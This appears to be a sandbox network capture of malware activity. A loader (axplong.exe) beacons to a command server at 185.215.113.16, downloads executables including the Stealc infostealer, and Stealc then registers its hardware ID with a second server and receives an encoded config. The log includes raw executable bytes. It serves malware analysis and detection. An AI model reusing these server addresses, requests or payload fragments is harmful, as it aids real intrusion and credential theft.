                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551671028 CET1236INData Raw: 68 6a b8 41 00 e8 be 01 00 00 59 c3 56 57 6a 01 e8 33 5e 00 00 59 bf 10 66 42 00 8b f0 8b cf e8 0d 0f 00 00 6a 00 56 8b cf c7 05 10 66 42 00 cc cb 41 00 e8 69 1a 00 00 68 74 b8 41 00 e8 86 01 00 00 59 5f 5e c3 6a 01 6a 00 68 10 66 42 00 b9 c0 65
                                                                                                                                                                                                                                                  Data Ascii: hjAYVWj3^YfBjVfBAihtAY_^jjhfBeBh~AeYeBiBhAEYhA9YUueYtu(Yt]} 1UuY]UEV AtjVYY^
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551683903 CET1224INData Raw: 01 8b 45 08 89 41 04 89 0d a4 65 42 00 c9 c3 e8 0a 04 00 00 cc 56 57 8b 79 04 8b 07 8b 70 08 8b ce ff 15 10 37 42 00 8b cf ff d6 8b f8 85 ff 74 12 8b 0f 6a 01 8b 31 8b ce ff 15 10 37 42 00 8b cf ff d6 5f 5e c3 56 eb 15 8b 06 8b ce a3 a4 65 42 00
                                                                                                                                                                                                                                                  Data Ascii: EAeBVWyp7Btj17B_^VeBV0Y5eBu^UVjjuYYSBEQN$AEtPjlYYBEQN,^]UEx$tp$j>YY]USW}9;t>;t3Y#t*
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.552109003 CET1236INData Raw: ff 75 08 8b f1 89 75 fc e8 eb fe ff ff c7 06 60 cb 41 00 8b c6 5e c9 c2 04 00 55 8b ec 56 ff 75 08 8b f1 e8 93 e6 ff ff c7 06 60 cb 41 00 8b c6 5e 5d c2 04 00 55 8b ec 51 56 ff 75 08 8b f1 89 75 fc e8 b1 fe ff ff c7 06 a8 c3 41 00 8b c6 5e c9 c2
                                                                                                                                                                                                                                                  Data Ascii: uu`A^UVu`A^]UQVuuA^aaAB$AUEM#P+w]{AQvRPPQEAQvPRPQ+UE9EtQvPuRQ]UU


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.449791185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:06.464241028 CET184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 64 31 3d 31 30 30 31 35 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                  Data Ascii: d1=1001527001&unit=246122658369
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.146226883 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:05 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 4 <c>0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.149888039 CET54OUTGET /test/am209.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.397376060 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:06 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 439808
                                                                                                                                                                                                                                                  Last-Modified: Fri, 08 Nov 2024 07:05:53 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "672db851-6b600"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 51 b8 2d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f4 04 00 00 00 02 00 00 00 00 00 d7 a1 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)#,(,/,),,(,-,-j,U%,U,U.,Rich,PELQ-g@0@@EE8@<.text `.rdataPHJ@@.datam`,B@.rsrcn@@.relocEFp@B
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.397389889 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 f0 cb 44 00 e8 37 8f 02 00 59 c3 cc cc cc cc 68 90 cb 44 00 e8 27 8f 02 00 59
                                                                                                                                                                                                                                                  Data Ascii: hD7YhD'Yj hEdnF?1hPDYj hEtF1hDYjhETuF0hDYj h$EoF0hpDYjhHELtF0hDY
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.397399902 CET448INData Raw: cc cc cc 6a 04 68 e4 d2 45 00 b9 0c 72 46 00 e8 bf 2c 02 00 68 d0 d9 44 00 e8 86 8a 02 00 59 c3 cc cc cc 6a 04 68 ec d2 45 00 b9 78 77 46 00 e8 9f 2c 02 00 68 30 da 44 00 e8 66 8a 02 00 59 c3 cc cc cc 6a 04 68 f4 d2 45 00 b9 a4 73 46 00 e8 7f 2c
                                                                                                                                                                                                                                                  Data Ascii: jhErF,hDYjhExwF,h0DfYjhEsF,hDFYjhEhxF_,hD&YjhE<uF?,hPDYjhElF,hDYjhElF+hDYjh0E,mF+
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.397454977 CET1236INData Raw: cc cc cc 6a 0c 68 7c d3 45 00 b9 28 79 46 00 e8 ff 2a 02 00 68 10 df 44 00 e8 c6 88 02 00 59 c3 cc cc cc 6a 0c 68 8c d3 45 00 b9 5c 6d 46 00 e8 df 2a 02 00 68 70 df 44 00 e8 a6 88 02 00 59 c3 cc cc cc 6a 04 68 9c d3 45 00 b9 ec 70 46 00 e8 bf 2a
                                                                                                                                                                                                                                                  Data Ascii: jh|E(yF*hDYjhE\mF*hpDYjhEpF*hDYjhEmF*h0DfYjhE$oF*hDFYjhEdqF_*hD&YjhEloF?*hPDYjhE xF*
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.397464991 CET1236INData Raw: 68 50 ed 44 00 e8 06 84 02 00 59 c3 cc cc cc 6a 4c 68 d8 d5 45 00 b9 c4 71 46 00 e8 1f 26 02 00 68 b0 ed 44 00 e8 e6 83 02 00 59 c3 cc cc cc 6a 3c 68 28 d6 45 00 b9 a4 6d 46 00 e8 ff 25 02 00 68 10 ee 44 00 e8 c6 83 02 00 59 c3 cc cc cc 6a 0c 68
                                                                                                                                                                                                                                                  Data Ascii: hPDYjLhEqF&hDYj<h(EmF%hDYjhhEsF%hpDYjhxE<rF%hDYjhEqF%h0DfYjhEtF%hDFYj@hE$lF_%hD&YjPh
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.397475958 CET1236INData Raw: 45 00 b9 b4 72 46 00 e8 5f 21 02 00 68 f0 fb 44 00 e8 26 7f 02 00 59 c3 cc cc cc 6a 20 68 5c da 45 00 b9 0c 6f 46 00 e8 3f 21 02 00 68 50 fc 44 00 e8 06 7f 02 00 59 c3 cc cc cc 6a 0c 68 80 da 45 00 b9 e0 78 46 00 e8 1f 21 02 00 68 b0 fc 44 00 e8
                                                                                                                                                                                                                                                  Data Ascii: ErF_!hD&Yj h\EoF?!hPDYjhExF!hD~YjhErF hD~YjhEtF hpD~YjhE,vF hD~Yh0Dw~YhDg~YhDW~Yj@hE
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.397489071 CET1236INData Raw: c9 0f 45 c1 c3 cc cc 55 8b ec 56 8b f1 8d 46 04 c7 06 24 16 45 00 50 e8 8f 88 02 00 83 c4 04 f6 45 08 01 74 0b 6a 0c 56 e8 50 7a 02 00 83 c4 08 8b c6 5e 5d c2 04 00 0f 57 c0 8b c1 66 0f d6 41 04 c7 41 04 50 ce 45 00 c7 01 4c 18 45 00 c3 cc cc cc
                                                                                                                                                                                                                                                  Data Ascii: EUVF$EPEtjVPz^]WfAAPELEQWYUVuVV^]VWVfVVV^UjhDdP$aF3PEdEEPWUMB
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.397500992 CET328INData Raw: ac 83 c4 08 c7 07 30 17 45 00 83 fa 10 72 28 8b 4d 98 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 77 43 52 51 e8 75 75 02 00 83 c4 08 8b 4b 08 8b c7 8b 53 0c c7 07 58 18 45 00 89 4f 0c 89 57 10 8b 4d f4 64 89 0d 00
                                                                                                                                                                                                                                                  Data Ascii: 0Er(MBrI#+wCRQuuKSXEOWMdY_^M3n][,'UVF$EP?EtjVu^]UVuWWGP$EfFPXEFNGOdE
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.397506952 CET1236INData Raw: cc cc cc cc cc cc cc cc cc cc cc b8 7c ce 45 00 c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 57 ff 75 0c e8 d4 60 02 00 8b 75 08 8b d0 8b ca 83 c4 04 c7 06 00 00 00 00 c7 46 10 00 00 00 00 8d 79 01 c7 46 14 0f 00 00 00 c6 06 00 8a 01 41 84 c0 75
                                                                                                                                                                                                                                                  Data Ascii: |EUVWu`uFyFAu+QR_^]UEVtjVs^]EUEVu/ujhTEFF^]WP`uF
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.397677898 CET1236INData Raw: 03 00 00 00 8b c6 f0 0f b1 0b 3b c6 0f 45 f0 83 fe 02 75 26 8d 77 34 56 e8 15 5f 02 00 83 c4 04 85 c0 75 44 56 c6 47 64 01 e8 29 5f 02 00 8d 47 0c 50 e8 2e 52 02 00 83 c4 08 83 c8 ff 8d 4f 04 f0 0f c1 01 48 75 07 8b 07 8b cf ff 50 04 8b 4d f4 64
                                                                                                                                                                                                                                                  Data Ascii: ;Eu&w4V_uDVGd)_GP.ROHuPMdY_^[]PZPZUjhDdPSVW$aF3PEd}sVEu~^EC<tQ3H98tu uK<JxuS@j
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:07.397691965 CET1236INData Raw: 00 00 c6 45 fc 01 8b 4e 24 85 c9 74 08 8b 01 57 ff 10 89 47 24 83 fb ff 75 43 89 7d ec c7 45 fc 02 00 00 00 8b 4f 24 85 c9 0f 84 b8 00 00 00 8b 01 ff 50 08 8b 4f 24 85 c9 74 15 8b 11 3b cf 0f 95 c0 0f b6 c0 50 ff 52 10 c7 47 24 00 00 00 00 6a 28
                                                                                                                                                                                                                                                  Data Ascii: EN$tWG$uC}EO$PO$t;PRG$j(WajnWfEptFpMuEWhp3@tMEEt!Fu~OuPMdY_^[M3`c]O


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.449807185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.008780003 CET184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 64 31 3d 31 30 30 34 38 39 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                  Data Ascii: d1=1004899001&unit=246122658369
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.563539028 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:08 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 4 <c>0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.569436073 CET64OUTGET /inc/stealc_valenciga.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.791071892 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:08 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 245760
                                                                                                                                                                                                                                                  Last-Modified: Tue, 24 Dec 2024 21:07:16 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "676b2284-3c000"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a4 f0 6a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 46 22 00 00 00 00 00 d0 1b 02 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 25 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELjgF"@%@Lf<$|<.text `.rdata@@.data+!pV@.reloc]$^b@B
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.791125059 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 08 56 68 04 01 00 00 6a 00 c7 45 f8 ff 00 00 00 ff 15 f4 90 63 00
                                                                                                                                                                                                                                                  Data Ascii: UVhjEcPcEPhjhChcuUMQVPPhCRcEPXc^]U,SVWhjPBhPQc
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.791136980 CET1236INData Raw: fb ff ff 52 ff 15 ac 8f 63 00 83 f8 05 0f 8e c9 02 00 00 68 40 1d 43 00 8d 85 d8 fb ff ff 50 ff 15 9c 90 63 00 33 ff 80 3d 14 d0 42 00 00 74 11 8d a4 24 00 00 00 00 47 80 bf 14 d0 42 00 00 75 f6 8d 47 01 e8 4e 17 00 00 89 45 dc 85 c0 74 0c 68 14
                                                                                                                                                                                                                                                  Data Ascii: Rch@CPc3=Bt$GBuGNEthBP4ccPc4F"tEttPW4cSWchHCcXE]ttWV4chHCVcEtEttVP
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.791150093 CET1236INData Raw: 40 e8 bd 12 00 00 89 46 24 85 c0 74 0f 8b 7f 24 85 ff 74 08 57 50 ff 15 34 91 63 00 8b c6 5f c3 cc cc cc 55 8b ec 81 ec 48 02 00 00 53 56 57 33 ff 80 3d 14 d0 42 00 00 74 13 eb 07 8d a4 24 00 00 00 00 47 80 bf 14 d0 42 00 00 75 f6 8d 47 01 89 7d
                                                                                                                                                                                                                                                  Data Ascii: @F$t$tWP4c_UHSVW3=Bt$GBuG}kEthBP4c3]8BtCBu]C6uthBV4cEHHP(u)sFEt }t;tEPW4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.791162968 CET1236INData Raw: fe ff 75 0f 8b c7 e8 d4 0e 00 00 8b 45 ec e9 0d 09 00 00 68 68 1d 43 00 8d 95 e8 fd ff ff 52 ff 15 cc 90 63 00 85 c0 0f 84 be 08 00 00 68 6c 1d 43 00 8d 85 e8 fd ff ff 50 ff 15 cc 90 63 00 85 c0 0f 84 a4 08 00 00 33 f6 80 3d 14 d0 42 00 00 74 0a
                                                                                                                                                                                                                                                  Data Ascii: uEhhCRchlCPc3=BtFBuF}thBW4cuFk}0ttEt}tPS4cWSch\Cc<G!ttSV4ch\CVc
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.791284084 CET1236INData Raw: 8d 46 01 e8 13 09 00 00 8b d8 85 db 74 20 8b 45 ac 85 c0 74 19 83 7d 18 00 74 13 50 53 ff 15 34 91 63 00 8b 45 18 50 53 ff 15 9c 90 63 00 68 5c 1d 43 00 ff 15 ac 8f 63 00 8d 3c 06 8d 47 01 e8 d7 08 00 00 8b f0 85 f6 74 18 85 db 74 14 53 56 ff 15
                                                                                                                                                                                                                                                  Data Ascii: Ft Et}tPS4cEPSch\Cc<GttSV4ch\CVc}tEGEttVQ4cwpEh8]}0RcCKEtt"PV4cPVc
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.791296959 CET1236INData Raw: 70 18 eb 03 8d 49 00 81 ec 88 00 00 00 8d 45 08 8b cc e8 00 f0 ff ff 8b 46 10 50 8b 46 0c 83 ec 0c 8b fc 89 47 08 40 e8 1b 04 00 00 89 07 85 c0 74 0f 8b 4e 04 85 c9 74 08 51 50 ff 15 34 91 63 00 8b 46 f0 83 ec 0c 8b fc 89 47 08 40 e8 f5 03 00 00
                                                                                                                                                                                                                                                  Data Ascii: pIEFPFG@tNtQP4cFG@tNtQP4cNQG@tNtQP4cC,;\E\tuHt/9t*c;u
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.791309118 CET552INData Raw: 85 c9 75 ef 85 c9 75 03 33 c0 c3 56 8b 71 04 8d 50 01 c7 01 00 00 00 00 3b f2 7e 34 8b d6 2b d0 2b f2 8b c6 c1 e0 0c 03 c1 89 71 04 89 50 04 89 48 0c 8b 51 08 89 50 08 8b 51 08 85 d2 74 03 89 42 0c 89 41 08 c7 00 01 00 00 00 a3 c4 91 63 00 8d 41
                                                                                                                                                                                                                                                  Data Ascii: uu3VqP;~4++qPHQPQtBAcA^thHt(9t#9cucQPQPItAHt)9t$9cucPQPQ@tHjhpChCjhChC0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.791326046 CET1236INData Raw: 43 00 a3 a0 8d 63 00 e8 7f 1e 00 00 6a 0c 68 f8 1e 43 00 68 08 1f 43 00 a3 48 8d 63 00 e8 69 1e 00 00 6a 09 68 18 1f 43 00 68 24 1f 43 00 a3 bc 8b 63 00 e8 53 1e 00 00 83 c4 48 6a 10 68 30 1f 43 00 68 44 1f 43 00 a3 e8 8a 63 00 e8 3a 1e 00 00 6a
                                                                                                                                                                                                                                                  Data Ascii: CcjhChCHcijhCh$CcSHjh0ChDCc:jhXChdCc$jhpChCcjhChCcjhChC$cjhChCcHjhCh C4cjh Ch( Ccjh8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.791337967 CET224INData Raw: 58 24 43 00 a3 08 8e 63 00 e8 a9 19 00 00 6a 15 68 70 24 43 00 68 88 24 43 00 a3 d8 8a 63 00 e8 93 19 00 00 6a 14 68 a0 24 43 00 68 b8 24 43 00 a3 8c 8b 63 00 e8 7d 19 00 00 6a 0e 68 d0 24 43 00 68 e0 24 43 00 a3 38 8d 63 00 e8 67 19 00 00 6a 0e
                                                                                                                                                                                                                                                  Data Ascii: X$Ccjhp$Ch$Ccjh$Ch$Cc}jh$Ch$C8cgjh$Ch%CcQjh%Ch,%Cc;HcjhH%Ch\%C"jhp%Ch|%Ccjh%Ch%Ccjh%Ch%Ccjh%Ch
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:09.791348934 CET1236INData Raw: 25 43 00 a3 3c 89 63 00 e8 ca 18 00 00 6a 17 68 d8 25 43 00 68 f0 25 43 00 a3 4c 8a 63 00 e8 b4 18 00 00 83 c4 48 6a 0a 68 08 26 43 00 68 14 26 43 00 a3 1c 8d 63 00 e8 9b 18 00 00 6a 0d 68 20 26 43 00 68 30 26 43 00 a3 8c 89 63 00 e8 85 18 00 00
                                                                                                                                                                                                                                                  Data Ascii: %C<cjh%Ch%CLcHjh&Ch&Ccjh &Ch0&Ccjh@&ChL&CcojhX&Chh&C(cYjhx&Ch&CLcCjh&Ch&Cc-Hjh&Ch&CLcjh&Ch&Chcjh&Ch&C\cj h


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.449819135.181.65.216806128C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.614449024 CET89OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.280384064 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:11 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.283616066 CET417OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----AFHJJEHIEBKKFIDHDGHJ
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 216
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 35 35 37 36 44 46 41 33 34 34 32 34 30 39 36 35 37 32 39 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 76 61 6c 65 6e 63 69 67 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: ------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="hwid"8E5576DFA3442409657292------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="build"valenciga------AFHJJEHIEBKKFIDHDGHJ--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.509392023 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:11 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Content-Length: 180
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Data Raw: 59 6d 45 78 4d 7a 45 79 4d 57 4d 34 4f 44 6b 7a 59 7a 4e 6b 59 32 59 79 59 54 63 79 4d 44 55 35 4f 47 4e 68 4f 47 51 33 59 6d 4e 69 4e 7a 4e 6b 4e 44 6b 34 4e 6a 55 32 4e 6a 63 30 5a 6d 55 77 59 57 56 6a 4f 54 42 69 5a 57 45 79 4e 44 4d 35 5a 44 56 6b 4e 7a 51 32 4e 44 56 6a 59 6a 67 32 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                  Data Ascii: YmExMzEyMWM4ODkzYzNkY2YyYTcyMDU5OGNhOGQ3YmNiNzNkNDk4NjU2Njc0ZmUwYWVjOTBiZWEyNDM5ZDVkNzQ2NDVjYjg2fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.512278080 CET469OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCA
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 268
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
